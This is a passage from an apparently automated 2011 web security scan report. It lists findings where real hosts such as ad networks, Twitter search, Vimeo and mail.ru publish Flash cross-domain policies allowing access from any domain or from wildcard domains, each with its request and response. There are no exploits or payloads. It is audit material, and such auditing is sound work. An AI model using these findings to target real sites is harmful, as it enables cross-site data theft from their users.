<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.28. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.29. http://mbox5.offermatica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox5.offermatica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288767000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:52:47 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...
7.30. http://pda.loveplanet.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pda.loveplanet.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:45 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://loveplanet.ru/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
7.31. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...
7.32. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 26 Apr 2011 14:34:49 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
7.33. http://pl.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Sun, 17 Aug 2008 20:39:50 GMT
ETag: "10d0439-122-454addb2bd180"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...
7.34. http://player.vimeo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: player.vimeo.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 23:28:49 GMT
ETag: "3718ce-114-78aece40"
Accept-Ranges: bytes
Content-Length: 276
Cache-Control: max-age=315360000
Expires: Thu, 22 Apr 2021 16:03:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<all
...[SNIP]...
7.35. http://playspal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://playspal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: playspal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 25 Apr 2011 14:54:27 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 23 Nov 2010 09:52:59 GMT
ETag: "9828d2a-68-4ceb8efb"
Accept-Ranges: bytes
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
7.36. http://pretty.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pretty.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pretty.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:34 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://loveplanet.ru/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
7.37. http://r2.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r2.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:54 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.38. http://rbcgaru.hit.gemius.pl/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rbcgaru.hit.gemius.pl

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:56 GMT
Expires: Tue, 26 Apr 2011 02:44:56 GMT
Accept-Ranges: none
Cache-Control: max-age=43200
Last-Modified: Fri, 25 Mar 2011 05:08:30 GMT
Set-Cookie: Gtestss=Fsq2YwPLQP_9r7xYrzcdmPT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlSwsBFGvGQp0xo8SLL8RScGGGMaxFmPxD14HsMQGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: text/xml
Content-Length: 246

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://hit.gemius.pl -->
<cross-domain-policy>
   <allow-access-from domain="*" />
...[SNIP]...
7.39. http://rs.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:45:40 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 21 Oct 2010 07:11:54 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.40. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 21:09:16 GMT
Expires: Thu, 21 Apr 2011 21:08:25 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 63651
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.41. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:40:08 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Cache-Control: max-age=1800
Expires: Mon, 25 Apr 2011 15:01:27 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 124651946 124570955
Age: 521
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-31-sr2.prod.twitter.com
X-Cache: HIT
X-Cache-Hits: 4
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
7.42. http://widgets.fotocash.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.fotocash.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.fotocash.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:29:10 GMT
Content-Type: text/xml
Content-Length: 138
Last-Modified: Thu, 21 Oct 2010 13:56:12 GMT
Connection: close
Expires: Wed, 25 May 2011 14:29:10 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>
7.43. http://www.instantengage.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instantengage.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:00 GMT
Server: Apache/2.0.50 (Fedora)
Last-Modified: Wed, 04 Apr 2007 15:17:04 GMT
ETag: "55c03c-ca-f25f3c00"
Accept-Ranges: bytes
Content-Length: 202
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
7.44. http://cache.fimservecdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cache.fimservecdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.fimservecdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.67
Content-Type: application/xml
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Length: 695
Cache-Control: max-age=2592000
Date: Mon, 25 Apr 2011 16:07:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...
7.45. http://demr.opt.fimserve.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://demr.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: demr.opt.fimserve.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:45 GMT
Content-Type: application/xml
Connection: keep-alive
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Length: 695
Server: ASP/0.0.0.0/0.7.61

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...
7.46. http://desk.opt.fimserve.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://desk.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: desk.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 16:12:56 GMT
Content-Type: application/xml
Connection: keep-alive
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Length: 695

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...
7.47. http://gomail.radar.imgsmail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gomail.radar.imgsmail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gomail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:51:42 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>
7.48. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 24 Apr 2011 21:14:04 GMT
Expires: Mon, 25 Apr 2011 21:14:04 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53567
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
7.49. http://imagesrv.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 11 Jan 2010 19:57:11 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 250
ETag: "pv3dca051be9ba6a415f8df8e0b0d315af"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.U50F79C0A].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3bc17e06277dbf6b1363ce7f36ea10b3bb7b54d78751fcaa4db564e4; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
<allow-access-from domain="imagesrv" />
...[SNIP]...
7.50. http://img.dt00.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://img.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:50:50 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:50:50 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...
7.51. http://img.imgsmail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://img.imgsmail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.imgsmail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:54:43 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
